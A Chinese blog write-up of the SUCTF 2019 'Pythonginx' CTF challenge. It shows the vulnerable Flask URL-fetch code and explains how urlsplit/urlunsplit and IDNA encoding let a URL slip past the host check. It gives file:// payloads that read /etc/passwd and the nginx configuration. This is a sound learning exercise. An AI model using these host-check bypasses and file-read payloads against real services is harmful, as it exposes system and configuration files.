[SUCTF 2019]Pythonginx 

import urllib
from urllib import parse
from urllib.parse import urlsplit, urlunsplit

from flask import Flask
from flask import render_template
from flask import request
from flask import render_template_string

app = Flask(__name__)

@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
    url = request.args.get("url")
    host = parse.urlparse(url).hostname
    print(host)
    if host == 'suctf.cc':
        return "我扌 your problem? 111"
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return "我扌 your problem? 222 " + host
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    #去掉 url 中的空格
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    print(host)
    if host == 'suctf.cc':
        return urllib.request.urlopen(finalUrl).read()
    else:
        return "我扌 your problem? 333"

 上述代码被我修改过了以后变成如上,然后我在自己的python上面跑然后把它的字符串变换过程单独提出来,用python测试

import urllib
from urllib import parse
from urllib.parse import urlsplit, urlunsplit

from flask import Flask
from flask import render_template
from flask import request
from flask import render_template_string

url = "file://suctf.cc/etc/passwd"
host = parse.urlparse(url).hostname
print(host)
parts = list(urlsplit(url))
print(parts)
host = parts[1]
print(host)
newhost = []
for h in host.split('.'):
    print(h)
    newhost.append(h.encode('idna').decode('utf-8'))
#suctf
# print('?'.join(newhost))
print('newhost:',newhost)
parts[1] = '.'.join(newhost)
print(parts)
#去掉 url 中的空格
finalUrl = urlunsplit(parts).split(' ')[0]
print(finalUrl)
host = parse.urlparse(finalUrl).hostname
print(host)

 

 

 

 所以上述情况很明显是绕过不那个判断的,代码审计,需要前面两次进行判断的时候host不能是suctf.cc但是最后面又要是suctf.cc

这个题目有两种绕过办法,一种是用他的加密手法

newhost.append(h.encode('idna').decode('utf-8'))

 

来绕过,另外一种是利用他 urlunsplit()方法还有urlspli()方法来绕过,假设在file:协议后面再加上两条//那么久可以绕过前面那个

我主要讲一下第二种,第一种不太适合我。

把字符串那边加上了以后,跑出来结果是这样

 

 

 这说明能够成功绕过,于是可以利用这个直接来读文件

 

 

 

 讲讲Nginx

nginx

Nginx (engine x) 是一个高性能的HTTP反向代理web服务器,同时也提供了IMAP/POP3/SMTP服务。

nginx和apache区别:https://cloud.tencent.com/developer/article/1635326

#配置
配置文件: /usr/local/nginx/conf/nginx.conf
配置文件存放目录:/etc/nginx
主配置文件:/etc/nginx/conf/nginx.conf
管理脚本:/usr/lib64/systemd/system/nginx.service
模块:/usr/lisb64/nginx/modules
应用程序:/usr/sbin/nginx
程序默认存放位置:/usr/share/nginx/html
日志默认存放位置:/var/log/nginx
 于是我直接查看他的配置文件

 payload:

  /getUrl?url=file:////suctf.cc/usr/local/nginx/conf/nginx.conf

 

 发现flag

于是直接

 

 

 

posted @ 2022-06-30 14:51  FPointmaple  阅读(133)  评论(0编辑  收藏  举报